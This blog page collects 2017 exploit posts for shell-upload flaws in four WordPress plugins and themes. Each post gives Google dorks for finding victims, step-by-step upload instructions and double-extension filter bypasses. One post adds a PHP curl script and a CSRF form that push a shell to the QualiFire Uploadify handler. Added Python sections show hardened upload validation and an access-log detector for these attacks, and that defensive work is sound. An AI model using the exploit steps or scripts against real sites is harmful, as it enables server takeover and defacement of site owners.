Thursday, February 23, 2017

WordPress Plugins WP Mobile Detector Shell Upload Vulnerability




#- Title: WordPress Plugins WP Mobile Detector Shell Upload Vulnerability
#- Author: aaditya purani
#- Date: 2016/06/03
#- Developer : Jesse Friedman
#- Link Download : wordpress. org/plugins/wp-mobile-detector
#- Google Dork: inurl:"/plugins/wp-mobile-detector/"
#- Fixed in Version : 3.6 (the fix is in the resize script, resize.php)
#- Tested on : windows
=======================================================
-- Proof Of Concept --

Description : 
This vulnerability, WP Mobile Detector Arbitrary File Upload, has been disclosed publicly and affects version 3.5: an attacker can make the site fetch a malicious file (a PHP shell) from a URL of their choosing and store it on the server. More than 10,000 websites were hit by this bug. The vendor has since released patched versions, 3.6 and 3.7, and Sucuri has published an advisory on the vulnerability.

Vulnerability : site/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]

Method : 
1. Find a target.
2. Request Target/wp-content/plugins/wp-mobile-detector/resize.php?src=<link to your shell>
3. If it succeeds, the shell is saved in the plugin's cache/ directory.

Shell format : php


Wordpress Plugins impact template editor KCFinder Shell Upload





#- Title: Wordpress Plugins impact-template-editor KCFinder Shell Upload
#- Author: Putra Attacker
#- Date: -
#- Developer : WPEka Club
#- Link Download : wordpress. org/plugins/impact-template-editor/
#- Google Dork: inurl:"/plugins/impact-template-editor/"
#- Fixed in Version : -
#- Tested on : win
=======================================================

-- Proof Of Concept --




Vulnerable : /wp-content/plugins/impact-template-editor/lib/kcfinder/browse.php

When vulnerable : the KCFinder file browser loads.

Method :
1. Upload your shell. The .php extension is not allowed, so upload it with a double extension such as .php.asp or .php.pler instead.
2. If the upload succeeds, find your shell. The browser's settings tell you where it went, for example :

browser.uploadURL = "/upload";
browser.dir = "impact";


Saturday, February 4, 2017

Wordpress Product Options for WooCommerce Plugin File Upload




#- Title: Wordpress Product Options for WooCommerce Plugin File Upload
#- Author: M4ni4c
#- Date: 2016-04-11
#- Developer : WPShowCase
#- Link Download : codecanyon. net/item/product-options-for-woocommerce-wp-plugin/7973927
#- Google Dork: inurl:"/plugins/woocommerce-product-options/"
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --


Vulnerability : site/wp-content/plugins/woocommerce-product-options/includes/image-upload.php

When vulnerable : the page shows an upload form.

Method :

Prepare : rename your shell so it carries the double extension .php;.jpg
Example : 3xploi7.php -> 3xploi7.php;.jpg

1. Choose your target.
2. Request /wp-content/plugins/woocommerce-product-options/includes/image-upload.php on the target.
3. The page shows the uploader; upload your shell there.

Example : 3xploi7.blogspot.com/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
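Both the KCFinder post above and this one get past the upload filter in the same way: the filter only looks at the text after the last dot. A name such as shell.php.asp passes a php denylist (on an Apache host that maps .php with AddHandler, mod_mime's multiple-extension handling can still run it as PHP), and 3xploi7.php;.jpg passes an image allowlist (IIS 6 stops reading the file name at the semicolon). The Python below is an added example, not code from either plugin: it puts the two naive checks beside a hardened version that normalises the name, sniffs the content, and lets the server pick the stored file name. The allowlist, the magic-byte table and all function names are assumptions made for this example.

```python
import re
import secrets

# Assumption for this example: the uploader is meant to accept images only.
ALLOWED_IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}

# Leading bytes of the allowed types (GIF87a and GIF89a both start with "GIF8").
MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF8": "gif",
}

SAFE_BASENAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def naive_denylist_check(filename):
    """The KCFinder-style filter from the post above: refuse only when the
    LAST extension is php. 'shell.php.asp' is accepted."""
    return filename.rsplit(".", 1)[-1].lower() != "php"


def naive_allowlist_check(filename):
    """Last-extension allowlist: '3xploi7.php;.jpg' is accepted because the
    text after the final dot is 'jpg'."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_IMAGE_EXTENSIONS


def hardened_check(filename):
    """Accept only '<base>.<ext>': one dot, a plain base name, an allowed extension.
    Separators that servers or filesystems treat specially are refused outright."""
    if any(ch in filename for ch in ";\x00/\\:%"):
        return False
    parts = filename.split(".")
    if len(parts) != 2:
        return False
    base, ext = parts
    return bool(SAFE_BASENAME_RE.match(base)) and ext.lower() in ALLOWED_IMAGE_EXTENSIONS


def sniff_image_extension(data):
    """Return the extension implied by the file's leading bytes, or None."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def safe_store_name(filename, data, token=None):
    """Return the name to store the upload under, or None to reject it.
    The server chooses the name: a random token plus the extension derived
    from the sniffed content, which must agree with what the client claimed."""
    if not hardened_check(filename):
        return None
    claimed = filename.rsplit(".", 1)[1].lower()
    if claimed == "jpeg":
        claimed = "jpg"
    sniffed = sniff_image_extension(data)
    if sniffed is None or sniffed != claimed:
        return None
    token = token or secrets.token_hex(16)
    return f"{token}.{sniffed}"


if __name__ == "__main__":
    for name in ("photo.jpg", "shell.php.asp", "3xploi7.php;.jpg", "shell.phtml"):
        print(f"{name:18} denylist={naive_denylist_check(name)!s:5} "
              f"allowlist={naive_allowlist_check(name)!s:5} hardened={hardened_check(name)}")
```

The point of safe_store_name is that nothing the client sent survives into the path on disk: the token replaces the base name, and the extension comes from the bytes, not from the claimed name, so the double-extension and semicolon tricks have nothing left to act on.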


Friday, January 20, 2017

Wordpress Themes QualiFire File Upload Vulnerability




#- Title: Wordpress Themes QualiFire File Upload Vulnerability
#- Author: Tn_Scorpion
#- Date: 01-07-2012
#- Developer : AndonDesign
#- Link Download : themeforest .net/item/qualifire-wordpress-theme/105879
#- Google Dork: inurl:"/themes/qualifire/"
#- Fixed in Version : -
#- Tested on : win
=======================================================

-- Proof Of Concept --



Vulnerable : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

When vulnerable : the page is blank.

Remote file :
<?php
// Upload shell.php through the theme's Uploadify handler, which accepts
// the file without any authentication check.
$uploadfile = "shell.php";
$ch = curl_init("http://example.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    // Uploadify reads the file from the "Filedata" field.
    // CURLFile replaces the old "@filename" syntax (PHP 5.5 and later).
    'Filedata' => new CURLFile($uploadfile),
    // Directory the handler writes into, relative to the web root.
    'folder'   => '/wp-content/themes/qualifire/scripts/admin/uploadify/',
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

// The handler echoes the stored path on success.
print $postResult;
?>

CSRF :
<form
action="http://target .com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
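All four posts on this page leave one of two shapes in the web server access log: a GET to resize.php whose src parameter is a remote URL (followed by a request for the fetched file under cache/), or a POST straight to an upload handler that should only ever be reached from the admin area, followed by a request for a double-extension file name. The Python below is an added example, not code from any of the plugins or themes, that scans Apache combined-format log lines for those shapes. The endpoint paths are the ones quoted in the posts; the rule names, the sample log lines, the upload destination paths in them, and the IP addresses (RFC 5737 documentation ranges) are constructed for this example.

```python
"""Scan Apache combined-format access-log lines for the request shapes the
posts above describe. The sample lines are constructed, not a real log."""
import re
from urllib.parse import parse_qs, urlsplit

# ip ident user [timestamp] "METHOD target protocol" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths quoted in the posts. A POST to any of these from outside wp-admin is suspect.
UPLOAD_ENDPOINTS = (
    "/wp-content/plugins/impact-template-editor/lib/kcfinder/browse.php",
    "/wp-content/plugins/woocommerce-product-options/includes/image-upload.php",
    "/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php",
)
RESIZE_ENDPOINT = "/wp-content/plugins/wp-mobile-detector/resize.php"
RESIZE_CACHE_DIR = "/wp-content/plugins/wp-mobile-detector/cache/"

# "shell.php.asp", "3xploi7.php;.jpg", "x.php%00.jpg": a script extension that is
# not the last thing in the name, which a last-extension filter lets through.
DOUBLE_EXT_RE = re.compile(r"\.ph(?:p\d?|tml)(?:[.;]|%00)", re.IGNORECASE)


def classify(method, target):
    """Return the rule names (labels assumed for this example) that fire for one request."""
    hits = []
    parts = urlsplit(target)
    path, query = parts.path, parse_qs(parts.query)

    if path == RESIZE_ENDPOINT:
        for src in query.get("src", []):
            # resize.php being told to fetch from another host is the primitive in post 1
            if urlsplit(src).scheme.lower() in ("http", "https", "ftp"):
                hits.append("resize-remote-src")
            if urlsplit(src).path.lower().endswith(".php"):
                hits.append("resize-php-src")
    # Anything executable requested from the resize cache is the payload landing
    if path.startswith(RESIZE_CACHE_DIR) and path.lower().endswith(".php"):
        hits.append("cache-php-exec")
    if method == "POST" and path in UPLOAD_ENDPOINTS:
        hits.append("direct-upload-endpoint")
    if DOUBLE_EXT_RE.search(target):
        hits.append("double-extension")
    return hits


def scan(lines):
    """Return one finding per (request, rule); lines that do not parse are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule in classify(m["method"], m["target"]):
            findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "rule": rule})
    return findings


def by_source(findings):
    """Collapse findings to {ip: sorted rule names} for triage."""
    out = {}
    for f in findings:
        out.setdefault(f["ip"], set()).add(f["rule"])
    return {ip: sorted(rules) for ip, rules in out.items()}


# Constructed sample log. The KCFinder destination (upload/impact/) is assumed from the
# browser.uploadURL / browser.dir values quoted in that post; the WooCommerce
# destination under wp-content/uploads/ is likewise an assumption.
SAMPLE_LOG = """\
203.0.113.7 - - [23/Feb/2017:10:01:02 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://198.51.100.5/shell.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Feb/2017:10:01:05 +0000] "GET /wp-content/plugins/wp-mobile-detector/cache/shell.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.22 - - [23/Feb/2017:10:02:00 +0000] "POST /wp-content/plugins/impact-template-editor/lib/kcfinder/browse.php HTTP/1.1" 200 77 "-" "curl/7.52.1"
198.51.100.22 - - [23/Feb/2017:10:02:03 +0000] "GET /wp-content/plugins/impact-template-editor/lib/kcfinder/upload/impact/shell.php.asp HTTP/1.1" 200 4096 "-" "curl/7.52.1"
198.51.100.22 - - [23/Feb/2017:10:03:00 +0000] "POST /wp-content/plugins/woocommerce-product-options/includes/image-upload.php HTTP/1.1" 200 61 "-" "curl/7.52.1"
198.51.100.22 - - [23/Feb/2017:10:03:02 +0000] "GET /wp-content/uploads/3xploi7.php;.jpg HTTP/1.1" 200 4096 "-" "curl/7.52.1"
198.51.100.22 - - [23/Feb/2017:10:04:00 +0000] "POST /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php HTTP/1.1" 200 9 "-" "curl/7.52.1"
192.0.2.9 - - [23/Feb/2017:10:05:00 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=wp-content/uploads/2017/02/photo.jpg HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
192.0.2.9 - - [23/Feb/2017:10:05:01 +0000] "GET /index.php HTTP/1.1" 200 12000 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, rules in by_source(scan(SAMPLE_LOG.splitlines())).items():
        print(ip, ", ".join(rules))
```

The legitimate resize request from 192.0.2.9 (a local src path) produces no finding, which is the check worth keeping: a rule that fires on every hit to resize.php would be useless on a site where the plugin is in normal use, whereas a src with a scheme, or a request for anything ending in .php under cache/, has no legitimate reason to appear.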

